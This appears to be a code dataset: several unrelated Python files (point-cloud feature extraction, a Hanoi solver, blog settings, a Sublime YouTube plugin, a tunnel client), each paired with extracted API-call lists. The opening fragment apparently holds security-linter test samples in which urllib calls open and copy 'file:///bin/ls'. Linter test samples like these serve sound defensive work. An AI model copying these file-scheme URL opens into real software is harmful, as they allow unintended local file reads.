"urllib.URLopener",
"six.moves.urllib.request.urlretrieve",
"urllib.urlretrieve",
"six.moves.urllib.request.URLopener",
"six.moves.urllib.request.FancyURLopener",
"urllib2.urlopen",
"urllib2.build_opener"
] |
[((469, 499), 'urllib.quote', 'urllib.quote', (['"""file:///bin/ls"""'], {}), "('file:///bin/ls')\n", (481, 499), False, 'import urllib\n'), ((504, 535), 'urllib.urlopen', 'urllib.urlopen', (['url', '"""blah"""', '(32)'], {}), "(url, 'blah', 32)\n", (518, 535), False, 'import urllib\n'), ((540, 588), 'urllib.urlretrieve', 'urllib.urlretrieve', (['"""file:///bin/ls"""', '"""/bin/ls2"""'], {}), "('file:///bin/ls', '/bin/ls2')\n", (558, 588), False, 'import urllib\n'), ((602, 620), 'urllib.URLopener', 'urllib.URLopener', ([], {}), '()\n', (618, 620), False, 'import urllib\n'), ((706, 729), 'urllib.FancyURLopener', 'urllib.FancyURLopener', ([], {}), '()\n', (727, 729), False, 'import urllib\n'), ((831, 861), 'urllib2.HTTPBasicAuthHandler', 'urllib2.HTTPBasicAuthHandler', ([], {}), '()\n', (859, 861), False, 'import urllib2\n'), ((1001, 1030), 'urllib2.build_opener', 'urllib2.build_opener', (['handler'], {}), '(handler)\n', (1021, 1030), False, 'import urllib2\n'), ((1035, 1065), 'urllib2.install_opener', 'urllib2.install_opener', (['opener'], {}), '(opener)\n', (1057, 1065), False, 'import urllib2\n'), ((1070, 1103), 'urllib2.urlopen', 'urllib2.urlopen', (['"""file:///bin/ls"""'], {}), "('file:///bin/ls')\n", (1085, 1103), False, 'import urllib2\n'), ((1108, 1141), 'urllib2.Request', 'urllib2.Request', (['"""file:///bin/ls"""'], {}), "('file:///bin/ls')\n", (1123, 1141), False, 'import urllib2\n'), ((1162, 1202), 'urllib.request.urlopen', 'urllib.request.urlopen', (['"""file:///bin/ls"""'], {}), "('file:///bin/ls')\n", (1184, 1202), False, 'import urllib\n'), ((1207, 1263), 'urllib.request.urlretrieve', 'urllib.request.urlretrieve', (['"""file:///bin/ls"""', '"""/bin/ls2"""'], {}), "('file:///bin/ls', '/bin/ls2')\n", (1233, 1263), False, 'import urllib\n'), ((1277, 1303), 'urllib.request.URLopener', 'urllib.request.URLopener', ([], {}), '()\n', (1301, 1303), False, 'import urllib\n'), ((1389, 1420), 'urllib.request.FancyURLopener', 'urllib.request.FancyURLopener', ([], 
{}), '()\n', (1418, 1420), False, 'import urllib\n'), ((1508, 1558), 'six.moves.urllib.request.urlopen', 'six.moves.urllib.request.urlopen', (['"""file:///bin/ls"""'], {}), "('file:///bin/ls')\n", (1540, 1558), False, 'import six\n'), ((1563, 1629), 'six.moves.urllib.request.urlretrieve', 'six.moves.urllib.request.urlretrieve', (['"""file:///bin/ls"""', '"""/bin/ls2"""'], {}), "('file:///bin/ls', '/bin/ls2')\n", (1599, 1629), False, 'import six\n'), ((1643, 1679), 'six.moves.urllib.request.URLopener', 'six.moves.urllib.request.URLopener', ([], {}), '()\n', (1677, 1679), False, 'import six\n'), ((1765, 1806), 'six.moves.urllib.request.FancyURLopener', 'six.moves.urllib.request.FancyURLopener', ([], {}), '()\n', (1804, 1806), False, 'import six\n')]
|
import logging
import os
from abc import ABC
import gin
import MinkowskiEngine as ME
import numpy as np
import open3d as o3d
import torch
from src.models import get_model
class BaseFeatureExtractor(ABC):
    """Common interface for point-cloud feature extractors."""

    def __init__(self):
        # Record which concrete extractor is being constructed.
        logging.info(f"Initialize {self.__class__.__name__}")

    def extract_feature(self, xyz):
        """Compute features for the points ``xyz``; concrete subclasses override this."""
        raise NotImplementedError("Feature should implement extract_feature method.")
@gin.configurable()
class FCGF(BaseFeatureExtractor):
    """FCGF feature extractor backed by a pretrained ResUNetBN2C checkpoint."""
    def __init__(self, voxel_size, checkpoint_path, device):
        # voxel_size: edge length used to quantize points into sparse voxels.
        # checkpoint_path: saved model file containing a "state_dict" entry.
        # device: torch device the network and inputs are moved to.
        super().__init__()
        self.voxel_size = voxel_size
        self.device = device
        assert os.path.exists(checkpoint_path), f"{checkpoint_path} not exists"
        MODEL = get_model("ResUNetBN2C")
        feat_model = MODEL(
            1, 32, bn_momentum=0.05, conv1_kernel_size=7, normalize_feature=True
        ).to(device)
        checkpoint = torch.load(checkpoint_path)
        feat_model.load_state_dict(checkpoint["state_dict"])
        self.feat_model = feat_model
        # Inference only: put the backbone into eval mode.
        self.feat_model.eval()
    def freeze(self):
        # Disable gradients so the backbone stays fixed during training.
        for param in self.feat_model.parameters():
            param.requires_grad = False
    def extract_feature(self, xyz, coords=None, feats=None):
        """Return (features, xyz) for a point cloud.

        When coords/feats are not supplied, xyz is voxel-quantized first and
        only the selected (quantized) points are returned with their features.
        """
        if coords is None or feats is None:
            # quantize input xyz.
            coords, sel = ME.utils.sparse_quantize(
                xyz / self.voxel_size, return_index=True
            )
            # make sparse tensor.
            coords = ME.utils.batched_coordinates([coords])
            feats = torch.ones((coords.shape[0], 1)).float()
            sinput = ME.SparseTensor(
                feats.to(self.device), coordinates=coords.to(self.device)
            )
            if isinstance(xyz, np.ndarray):
                xyz = torch.from_numpy(xyz)
            xyz = xyz[sel].float().to(self.device)
        else:
            # NOTE(review): this branch neither moves coords/feats to
            # self.device nor filters xyz to the quantized points -- confirm
            # callers pass device-resident, pre-aligned inputs here.
            sinput = ME.SparseTensor(coordinates=coords, features=feats)
        # extract feature.
        F = self.feat_model(sinput).F
        return F, xyz
@gin.configurable()
class FPFH(BaseFeatureExtractor):
    """FPFH feature extractor (Open3D), operating on a voxel-downsampled cloud."""
    def __init__(self, voxel_size, device):
        # BUG FIX: BaseFeatureExtractor.__init__ takes no arguments, so the
        # original `super().__init__(voxel_size, device)` raised TypeError and
        # never stored the settings that extract_feature reads.
        super().__init__()
        self.voxel_size = voxel_size
        self.device = device  # kept for interface parity with FCGF
    def extract_feature(self, xyz):
        """Return (FPFH features, downsampled xyz) for an (N, 3) point cloud.

        Accepts a numpy array or a CPU torch tensor.
        """
        voxel_size = self.voxel_size
        if isinstance(xyz, torch.Tensor):
            xyz = xyz.numpy()
        # downsample
        pcd = o3d.geometry.PointCloud()
        pcd.points = o3d.utility.Vector3dVector(xyz)
        pcd = pcd.voxel_down_sample(voxel_size)
        # calculate normals (required before computing FPFH)
        radius_normal = voxel_size * 2.0
        pcd.estimate_normals(
            o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30)
        )
        # calculate features
        radius_feature = voxel_size * 5.0
        pcd_fpfh = o3d.pipelines.registration.compute_fpfh_feature(
            pcd, o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100)
        )
        xyz = torch.from_numpy(np.asarray(pcd.points)).float()
        # Transpose so each row is one point's 33-bin descriptor; copy() keeps
        # the transposed data safely contiguous.
        F = torch.from_numpy(pcd_fpfh.data.copy().T).float().contiguous()
        return F, xyz
MODELS = [FPFH, FCGF]


@gin.configurable()
def get_feature(name):
    """Resolve a feature-extractor class from its class name.

    Returns the class, or None (after logging the valid options) when the
    name is unknown.
    """
    registry = {cls.__name__: cls for cls in MODELS}
    if name in registry:
        return registry[name]
    logging.info(f"Invalid model index. You put {name}. Options are:")
    # Display a list of valid model names
    for cls in MODELS:
        logging.info("\t* {}".format(cls.__name__))
    return None
|
[
"torch.ones",
"MinkowskiEngine.SparseTensor",
"torch.load",
"MinkowskiEngine.utils.sparse_quantize",
"os.path.exists",
"open3d.geometry.PointCloud",
"numpy.asarray",
"logging.info",
"open3d.geometry.KDTreeSearchParamHybrid",
"gin.configurable",
"MinkowskiEngine.utils.batched_coordinates",
"src.models.get_model",
"open3d.utility.Vector3dVector",
"torch.from_numpy"
] |
[((420, 438), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (436, 438), False, 'import gin\n'), ((2034, 2052), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (2050, 2052), False, 'import gin\n'), ((3102, 3120), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (3118, 3120), False, 'import gin\n'), ((240, 293), 'logging.info', 'logging.info', (['f"""Initialize {self.__class__.__name__}"""'], {}), "(f'Initialize {self.__class__.__name__}')\n", (252, 293), False, 'import logging\n'), ((642, 673), 'os.path.exists', 'os.path.exists', (['checkpoint_path'], {}), '(checkpoint_path)\n', (656, 673), False, 'import os\n'), ((724, 748), 'src.models.get_model', 'get_model', (['"""ResUNetBN2C"""'], {}), "('ResUNetBN2C')\n", (733, 748), False, 'from src.models import get_model\n'), ((900, 927), 'torch.load', 'torch.load', (['checkpoint_path'], {}), '(checkpoint_path)\n', (910, 927), False, 'import torch\n'), ((2358, 2383), 'open3d.geometry.PointCloud', 'o3d.geometry.PointCloud', ([], {}), '()\n', (2381, 2383), True, 'import open3d as o3d\n'), ((2405, 2436), 'open3d.utility.Vector3dVector', 'o3d.utility.Vector3dVector', (['xyz'], {}), '(xyz)\n', (2431, 2436), True, 'import open3d as o3d\n'), ((3303, 3369), 'logging.info', 'logging.info', (['f"""Invalid model index. You put {name}. Options are:"""'], {}), "(f'Invalid model index. You put {name}. 
Options are:')\n", (3315, 3369), False, 'import logging\n'), ((1337, 1403), 'MinkowskiEngine.utils.sparse_quantize', 'ME.utils.sparse_quantize', (['(xyz / self.voxel_size)'], {'return_index': '(True)'}), '(xyz / self.voxel_size, return_index=True)\n', (1361, 1403), True, 'import MinkowskiEngine as ME\n'), ((1490, 1528), 'MinkowskiEngine.utils.batched_coordinates', 'ME.utils.batched_coordinates', (['[coords]'], {}), '([coords])\n', (1518, 1528), True, 'import MinkowskiEngine as ME\n'), ((1890, 1941), 'MinkowskiEngine.SparseTensor', 'ME.SparseTensor', ([], {'coordinates': 'coords', 'features': 'feats'}), '(coordinates=coords, features=feats)\n', (1905, 1941), True, 'import MinkowskiEngine as ME\n'), ((2597, 2666), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_normal', 'max_nn': '(30)'}), '(radius=radius_normal, max_nn=30)\n', (2633, 2666), True, 'import open3d as o3d\n'), ((2834, 2905), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_feature', 'max_nn': '(100)'}), '(radius=radius_feature, max_nn=100)\n', (2870, 2905), True, 'import open3d as o3d\n'), ((1782, 1803), 'torch.from_numpy', 'torch.from_numpy', (['xyz'], {}), '(xyz)\n', (1798, 1803), False, 'import torch\n'), ((1549, 1581), 'torch.ones', 'torch.ones', (['(coords.shape[0], 1)'], {}), '((coords.shape[0], 1))\n', (1559, 1581), False, 'import torch\n'), ((2947, 2969), 'numpy.asarray', 'np.asarray', (['pcd.points'], {}), '(pcd.points)\n', (2957, 2969), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import math
import copy
from collections import namedtuple
Move = namedtuple('Move', 'source, target, disc')


def hanoi(discs):
    """Search for a sequence of moves solving Towers of Hanoi with ``discs`` discs.

    Rods are modelled as tuples of disc sizes, top of a rod being the last
    element; the solved state has every disc on rod 2.
    NOTE(review): already-visited states are pruned globally via ``visited``,
    so the result is whatever this depth-first search finds under that
    pruning -- confirm minimality before relying on move counts.
    """
    visited = set()

    def apply_move(state, src, dst, disc):
        # Successor state: pop `disc` off rod `src`, push it onto rod `dst`.
        successor = []
        for i, rod in enumerate(state):
            if i == src:
                successor.append(rod[:-1])
            elif i == dst:
                successor.append(rod + (disc,))
            else:
                successor.append(rod)
        return tuple(successor)

    def search(state, depth=0):
        if len(state[2]) == discs:
            return []      # goal reached: no further moves needed
        if state in visited:
            return None    # pruned: already explored via some earlier path
        visited.add(state)
        best_sequence = None
        best_tail_length = math.inf
        for src in range(len(state)):
            if not state[src]:
                continue
            disc = state[src][-1]
            for dst in range(len(state)):
                # Skip no-op moves and moves onto a smaller disc.
                if src == dst or (state[dst] and disc > state[dst][-1]):
                    continue
                tail = search(apply_move(state, src, dst, disc), depth + 1)
                if tail is not None and len(tail) < best_tail_length:
                    best_sequence = [Move(src, dst, disc)] + tail
                    best_tail_length = len(tail)
        return best_sequence

    initial = (tuple(range(discs - 1, -1, -1)), (), ())
    return search(initial)
def main():
    """Solve the 3-disc puzzle and report how many moves were found."""
    solution = hanoi(3)
    print(len(solution))


if __name__ == '__main__':
    main()
|
[
"collections.namedtuple"
] |
[((116, 158), 'collections.namedtuple', 'namedtuple', (['"""Move"""', '"""source, target, disc"""'], {}), "('Move', 'source, target, disc')\n", (126, 158), False, 'from collections import namedtuple\n')]
|
import os
import configparser
import yaml
import ast
from pathlib import Path
# --- configuration bootstrap: read config/config.ini.model relative to here --
HERE = Path(__file__).parent.absolute()
print(HERE)
config_dir = HERE / 'config/config.ini.model'
config = configparser.ConfigParser()
config.read(config_dir)
# Security / JWT settings.
ACCESS_TOKEN_EXPIRE_MINUTES = config.get('security', 'access_token_expire_minutes')
JWT_ALGORITHM = config.get('security', 'jwt_algorithm')
# GitHub OAuth application settings.
OAUTH_REDIRECT_PATH = config.get('github', 'oauth_redirect_path')
REDIRECT_URI = config.get('github', 'redirect_uri')
CLIENT_ID = config.get('github', 'client_id')
CLIENT_SECRET = config.get('github', 'client_secret')
HOST_PATH = config.get('global', 'host_path')
WEB_PORT = config.get('port', "fastapi")
# DB_URL = os.getenv('DB_URL', config.get('database', 'db_url'))
# Database connection pieces, assembled into a single URL below.
db_host = config.get('database', 'host')
db_username = config.get('database', 'username')
db_pwd = config.get('database', 'password')
db_port = config.get('database', 'port')
db = config.get('database', 'db')
charset = config.get('database', 'charset')
DB_URL = f'mysql+pymysql://{db_username}:{db_pwd}@{db_host}:{db_port}/{db}?charset={charset}'
print(DB_URL)
# Environment variables override the config file for deployment knobs.
REDIS_URL = os.getenv('REDIS_URL',
                      config.get('redis', 'redis_url'))
DEBUG = os.getenv('DEBUG', config.get('global', 'debug')).lower() \
    in ('true', 'y', 'yes', '1')
WTF_CSRF_SECRET_KEY = 123
AUTH_LOGIN_ENDPOINT = 'index.login'
MEMCACHED_HOST = os.getenv('MEMCACHED_HOST',
                           config.get('memcached', 'memcached_host'))
MEMCACHED_PORT = config.get('memcached', 'memcached_port')
oauth_redirect_path = '/oauth'
redirect_uri = 'http://127.0.0.1:8000/oauth'
client_id = "098a2e6da880878e05da"
client_secret = "<KEY>"
REACT_PROMPT = '喜欢这篇文章吗? 记得给我留言或订阅哦'
# NOTE(review): likely meant UPLOAD_FOLDER (also defined below) — confirm.
PLOAD_FOLDER = HERE / 'static/upload'
AUTHOR = 'zhikai'
SITE_TITLE = 'Zhikai-Yang Space'
PER_PAGE = 10
GOOGLE_ANALYTICS = ''
SENTRY_DSN = ''
REQUEST_TIMEOUT = 15
SHOW_PAGEVIEW = True
PERMALINK_TYPE = 'slug'  # one of: id, slug, title
# [(Endpoint, Name, IconName, Color), ...]
# SITE_NAV_MENUS = [('blog.index', '首页'), ('blog.topics', '专题'),
#                  ('blog.archives', '归档'), ('blog.tags', '标签'),
#                  ('index.search', '搜索'), ('/page/aboutme', '关于我'),
#                  ('index.feed', 'RSS', 'rss', '#fc6423')]
SITE_NAV_MENUS = [('blog.index', '首页'),
                  ('blog.activities', '动态'),
                  ('blog.tags', '标签'),
                  ('index.search', '搜索'),
                  ('blog.archives', '归档'),
                  ('/post/aboutme', '关于我')
                  ]
BEIAN_ID = ''
JWT_SECRET = config.get('security', 'jwt_secret')
EXPIRATION_DELTA = 60 * 60
WTF_CSRF_ENABLED = False
# Mail settings (credentials presumably filled in by local_settings).
MAIL_SERVER = 'smtp.qq.com'
MAIL_PORT = 465
MAIL_USERNAME = ''
MAIL_PASSWORD = ''
BLOG_URL = 'https://example.com'
UPLOAD_FOLDER = HERE / 'static/upload'
# Redis sentinel
REDIS_SENTINEL_SERVICE_HOST = None
REDIS_SENTINEL_SERVICE_PORT = 26379
SHOW_AUTHOR = True
class AttrDict(dict):
    """A dict whose entries can also be read and written as attributes."""
    def __init__(self, *args, **kwargs):
        dict.__init__(self, *args, **kwargs)
        # Alias the attribute namespace to the mapping itself, so d.key
        # and d['key'] share one storage.
        self.__dict__ = self
# Optional YAML overrides: load "partials" from config.yaml when present.
try:
    with open(HERE / 'config.yaml') as f:
        yaml_content = f.read()
    # safe_load avoids arbitrary Python object construction from the YAML
    # file (yaml.load without an explicit Loader is deprecated and unsafe).
    partials = AttrDict(yaml.safe_load(yaml_content)).partials
    USE_YAML = True
except FileNotFoundError:
    USE_YAML = False
    partials = {}
# Local, uncommitted settings take precedence when available.
try:
    from local_settings import *  # noqa
except ImportError:
    pass
# Opaque numeric kind identifiers (presumably content/activity kinds used
# elsewhere in the project — values themselves are just ids).
K_POST = 1001
K_COMMENT = 1002
# Time spans in seconds.
ONE_MINUTE = 60
ONE_HOUR = ONE_MINUTE * 60
ONE_DAY = ONE_HOUR * 24
K_STATUS = 1003
K_ACTIVITY = 1004
CDN_DOMAIN = ''
USE_FFMPEG = False
# File extensions treated as static assets.
STATIC_FILE_TYPES = ('jpg', 'png', 'webp', 'gif', 'mp4', 'css', 'js')
|
[
"pathlib.Path",
"configparser.ConfigParser",
"yaml.load"
] |
[((187, 214), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (212, 214), False, 'import configparser\n'), ((87, 101), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (91, 101), False, 'from pathlib import Path\n'), ((3142, 3165), 'yaml.load', 'yaml.load', (['yaml_content'], {}), '(yaml_content)\n', (3151, 3165), False, 'import yaml\n')]
|
import sublime
import sublime_plugin
import os
from ..lib import log, setup_log_panel, yte_setting, dotty
from ..lib import select_video, select_playlist, select_tag, select_timecode
from ..lib import Request, NetworkManager, stored_credentials_path, video_sort
# TODO:
# - Hit the keyword in the first few lines and 2-3 times total
# - The first few lines (how much?) are shown above the fold
# - Tags is 500 characters long, no more than 30 characters per tag
# - Tags with spaces may count as having a length + 2 because internally
# they're wrapped in quotes and that counts against the length
#   - Tags should include brand-related and channel tags for more relevance
# - Chapters: first must be at 0:00; there has to be at least 3 in ascending
# order, and the minimum length of a chapter is 10 seconds. There is no
# official doc on what the text should look like, but observably it seems to
#   ignore leading punctuation, as in "00:00 - Introduction" the " - " is
# skipped (though starting it with a literal " gets it added, so there's
# that)
###----------------------------------------------------------------------------
# Our global network manager object
# Global NetworkManager instance; created in loaded() and torn down in
# unloaded().  None while the plugin is not active.
netManager = None
###----------------------------------------------------------------------------
# The uploads playlist doesn't appear in the list of playlists associated with
# a user because it's channel specific and not user specific. This is a sample
# dotty entry with just enough information to allow for populating that
# playlist into a chooser.
#
# The actual ID of the placeholder needs to be established at the point where
# the data is actually collected.
_upload_template = {
    "id": "placeholder",
    "snippet": {
        "title": "Uploaded Videos"
    },
    "status": {
        "privacyStatus": "private",
    },
    "contentDetails": {
        # We don't know how many items are in the uploads playlist until we
        # fetch the contents of it. The display code in the chooser will use
        # markup to tell the user the list size is unknown in this case.
        # "itemCount": 0
    }
}
###----------------------------------------------------------------------------
def loaded():
    """
    Initialize our plugin state on load.
    """
    global netManager
    # Give every open window a log panel before announcing ourselves.
    for window in sublime.windows():
        setup_log_panel(window)
    log("PKG: YouTubeEditor loaded")
    yte_setting.obj = sublime.load_settings("YouTubeEditor.sublime-settings")
    yte_setting.default = dict(
        camtasia_folder=os.path.expanduser("~"),
        auto_show_panel=2,
        report_output_to_view=False,
        cache_downloaded_data=True,
        encrypt_cache=False,
        client_id="",
        client_secret="",
        auth_uri="",
        token_uri="",
    )
    netManager = NetworkManager()
netManager = NetworkManager()
def unloaded():
    """
    Clean up plugin state on unload.
    """
    global netManager
    # Nothing to do if the plugin never finished loading.
    if netManager is None:
        return
    netManager.shutdown()
    netManager = None
def youtube_has_credentials():
    """
    Determine if there are stored credentials for a YouTube login; this
    indicates that the user has previously gone through the login steps to
    authorize the plugin with YouTube.

    Returns the boolean result of NetworkManager.has_credentials().
    """
    return netManager.has_credentials()
def youtube_is_authorized():
    """
    Determine if the plugin is currently authorized or not. This indicates not
    only that the user has previously authorized the plugin on YouTube, but
    also that a request has been made that has validated (and potentially
    refreshed) our access token. If this is not the case, requests will fail.

    Returns the boolean result of NetworkManager.is_authorized().
    """
    return netManager.is_authorized()
def youtube_request(request, handler, reason, callback, **kwargs):
    """
    Dispatch a request to collect data from YouTube, invoking the given
    callback when the request completes. The request will store the given
    handler and all remaining arguments as arguments to the request dispatched.
    """
    # Wrap everything into a Request object and hand it to the manager.
    netManager.request(Request(request, handler, reason, **kwargs), callback)
###----------------------------------------------------------------------------
class YoutubeRequest():
    """
    This class abstracts away the common portions of using the NetworkManager
    to make requests and get responses back.

    A request can be made via the `request()` method, and the result will
    be automatically directed to a method in the class. The default handler
    is the name of the request preceded by an underscore.
    """
    # Cached authorization request/response, shared via class attributes.
    auth_req = None
    auth_resp = None
    # Arguments the command was run with; captured by run().
    run_args = None
    def run(self, **kwargs):
        # Stash the invocation arguments, then ensure we are authorized
        # before handing control to the subclass via _authorized().
        self.run_args = kwargs
        if not youtube_is_authorized():
            self.request("authorize", "_internal_auth", "Authorizing")
        else:
            self._authorized(self.auth_req, self.auth_resp)
    def _internal_auth(self, request, result):
        # Capture the auth request/response pair, then resume the command.
        self.auth_req = request
        self.auth_resp = result
        self._authorized(self.auth_req, self.auth_resp)
    def request(self, request, handler=None, reason=None, **kwargs):
        # Dispatch a request whose completion is routed through result().
        youtube_request(request, handler, reason, self.result, **kwargs)
    def result(self, request, success, result):
        # Route a completed request to the handler method named in the
        # request, or to _error() on failure.
        attr = request.handler if success else "_error"
        if not hasattr(self, attr):
            raise RuntimeError("'%s' has no handler for request '%s'" % (
                self.name(), request.name))
        handler = getattr(self, attr)
        handler(request, result)
    def _error(self, request, result):
        # Default error handler: report the failure in the log panel.
        log("Err: in '{0}': {2} (code={1})", request.name,
            result['error.code'], result['error.message'], display=True)
    # Assume that most commands want to only enable themselves when there are
    # credentials; commands that are responsible for obtaining credentials
    # override this method.
    def is_enabled(self, **kwargs):
        return youtube_has_credentials()
###----------------------------------------------------------------------------
class YouTubeVideoSelect(YoutubeRequest):
    """
    This class is a specialization on YoutubeRequest that specifically presumes
    that the ultimate goal is to have the user select a video for some purpose.

    The sequence of items here is:
        - Gather channel information
        - Gather list of playlists and prompt (or; assume uploads playlist)
        - Gather contents of selected playlist
        - Prompt by tags on videos in the playlist (optional based on args)
        - Prompt for a video (either in the tags or in the playlist)
        - Prompt for a timecode in the video (if any)
    """
    # These values control what the placeholder text in the various quick
    # panels will be for each of the given operations. The default value of
    # None defers the placeholder to the utility functions in the utils.py
    # file.
    #
    # video_tag_placeholder takes an optional format of {tag} to specify the
    # tag that was chosen to get to this video list.
    #
    # timecode_placeholder takes an optional format of {title} to specify the
    # title of the video the user is selecting a timecode from.
    playlist_placeholder = None
    tag_placeholder = None
    video_placeholder = None
    video_tag_placeholder = None
    timecode_placeholder = None
    def _authorized(self, request, result):
        # Entry point once authorization is confirmed: record the browse
        # modes requested by the command, then look up the channel.
        self.use_tags = self.run_args.get("by_tags", False)
        self.use_playlists = self.run_args.get("by_playlists", False)
        self.request("channel_list", reason="Get Channel Info")
    def _channel_list(self, request, result):
        self.channel = result[0]
        # Make a fake playlist from a template; populate it with the public
        # video count. The count will be adjusted later if/when the user
        # browses into the Uploads playlist.
        self.uploads_playlist = dotty.dotty(_upload_template)
        self.uploads_playlist['contentDetails.itemCount'] = self.channel['statistics.videoCount']
        self.uploads_playlist['id'] = self.channel['contentDetails.relatedPlaylists.uploads']
        if self.use_playlists:
            self.request("playlist_list", channel_id=self.channel['id'],
                         reason="Get user playlists")
        else:
            self.pick_playlist(self.uploads_playlist)
    def _playlist_list(self, request, result):
        # Sort playlists by title, with the synthesized Uploads entry first.
        self.playlists = video_sort(result, 'snippet.title')
        self.playlists.insert(0, self.uploads_playlist)
        select_playlist(self.playlists, self.pick_playlist,
                        placeholder=self.playlist_placeholder)
    def _playlist_contents(self, request, result):
        if self.use_tags:
            select_tag(result, self.pick_tag, show_back=self.use_playlists,
                       placeholder=self.tag_placeholder)
        else:
            # If this is the uploads playlist, update the video count to
            # include non-public videos.
            if request["playlist_id"] == self.uploads_playlist['id']:
                self.uploads_playlist['contentDetails.itemCount'] = len(result)
            # Pass the video list as the tag_list to the lambda so it can be
            # picked up and used again if the user goes back while editing the
            # timecode.
            videos = video_sort(result, "statistics.viewCount", int, True)
            select_video(videos, lambda vid: self.select_video(vid, None, videos),
                         show_back=self.use_playlists,
                         placeholder=self.video_placeholder)
    def pick_playlist(self, playlist):
        # Invoked with the user's playlist choice, or None if they cancelled.
        if playlist != None:
            self.request("playlist_contents",
                         reason="Get playlist contents",
                         playlist_id=playlist['id'])
    def pick_tag(self, tag, tag_list):
        # Invoked with the user's tag choice; "_back" navigates up a level.
        # NOTE(review): when tag == "_back" and use_playlists is False, the
        # code falls through to tag_list["_back"]; presumably the back entry
        # is only offered when use_playlists is True — confirm.
        if tag is not None:
            if tag == "_back":
                if self.use_playlists:
                    return select_playlist(self.playlists, self.pick_playlist,
                                           placeholder=self.playlist_placeholder)
            videos = video_sort(tag_list[tag], "statistics.viewCount", int, True)
            # Use the default, unless we have a specific placeholder for this.
            placeholder = (None if not self.video_tag_placeholder else
                           self.video_tag_placeholder.format(tag=tag))
            # Video ID is in contentDetails.videoId for short results or id for
            # full details (due to it being a different type of request)
            select_video(videos, lambda vid: self.select_video(vid, tag, tag_list),
                         show_back=True, placeholder=placeholder)
    def select_video(self, video, tag, tag_list):
        if video is None:
            return
        if video['id'] == "_back":
            # When using both tags and playlists, the browse order should send
            # us back to tags first and from there to playlists.
            if self.use_tags:
                return select_tag(None, self.pick_tag, self.use_playlists, tag_list,
                                  placeholder=self.tag_placeholder)
            return select_playlist(self.playlists, self.pick_playlist,
                                   placeholder=self.playlist_placeholder)
        self.picked_video(video, tag, tag_list)
    def pick_toc(self, timecode, text, video, tag, tag_list):
        # Invoked with the user's timecode choice; "_back" returns to the
        # previous chooser (tags when tags are in use, otherwise videos).
        if timecode != None:
            if timecode == "_back":
                if self.use_tags:
                    return self.pick_tag(tag, tag_list)
                else:
                    return select_video(tag_list, lambda vid: self.select_video(vid, None, None),
                                        show_back=self.use_playlists,
                                        placeholder=self.video_placeholder)
            self.picked_toc(timecode, text, video)
    def picked_video(self, video, tag, tag_list):
        """
        Override this if you want to know what video the user selected; the
        default will continue on to prompt the user for a timecode contained
        in the video instead.

        video represents the video chosen by the user, and tag is the tag they
        chose (if prompted; otherwise it is None). The tag_list argument should
        be ignored by outside code, as its value and use changes depending on
        how the user is browsing around in the content.
        """
        placeholder = (None if not self.timecode_placeholder else
                       self.timecode_placeholder.format(title=video['snippet.title']))
        select_timecode(video, lambda a, b: self.pick_toc(a, b, video, tag, tag_list),
                        show_back=True, placeholder=placeholder)
    def picked_toc(self, timecode, text, video):
        """
        Override this if you want to know what timecode the user selected from
        the table of contents of their selected video. You get told the
        timecode string, the text of the TOC entry associated with it, and the
        information on the video the user selected.
        """
        pass
###----------------------------------------------------------------------------
|
[
"sublime.windows",
"sublime.load_settings",
"os.path.expanduser"
] |
[((2314, 2331), 'sublime.windows', 'sublime.windows', ([], {}), '()\n', (2329, 2331), False, 'import sublime\n'), ((2426, 2481), 'sublime.load_settings', 'sublime.load_settings', (['"""YouTubeEditor.sublime-settings"""'], {}), "('YouTubeEditor.sublime-settings')\n", (2447, 2481), False, 'import sublime\n'), ((2537, 2560), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (2555, 2560), False, 'import os\n')]
|
#!/usr/bin/env python3
from argparse import ArgumentParser
from util import startTunnel, stopTunnel, addressesForInterface, srcAddressForDst
import logging
import signal
import requests
import socket
def main():
    """
    Resolve the remote host, ask it (over HTTP) to prepare a tunnel
    endpoint, then bring the local tunnel up until interrupted.
    """
    parser = ArgumentParser()
    parser.add_argument("--bridge", type=str)
    parser.add_argument("remoteIP", type=str)
    args = parser.parse_args()

    try:
        args.remoteIP = socket.gethostbyname(args.remoteIP)
    except socket.gaierror:
        # A bare except here would also swallow KeyboardInterrupt and
        # friends; name-resolution failures raise socket.gaierror.
        logging.error("Unable to resolve remote host: %s", args.remoteIP)
        return

    src = srcAddressForDst(args.remoteIP)
    if src is None:
        logging.error("Could not determine source address for destination %s.",
                      args.remoteIP)
        return

    response = requests.get("http://{}:5000/connect".format(args.remoteIP))
    if response.status_code != 200:
        # logging uses lazy %-style argument substitution; the original
        # passed "{}" placeholders which were never filled in.
        logging.error("Could not connect to server: HTTP %s: %s",
                      response.status_code, response.text)
        return

    startTunnel(args.remoteIP, src, args.bridge)
    try:
        # Block until a signal arrives, then tear the tunnel down on Ctrl-C.
        signal.pause()
    except KeyboardInterrupt:
        stopTunnel(args.remoteIP)

if __name__ == "__main__":
    main()
|
[
"logging.error",
"argparse.ArgumentParser",
"signal.pause",
"socket.gethostbyname",
"util.startTunnel",
"util.srcAddressForDst",
"util.stopTunnel"
] |
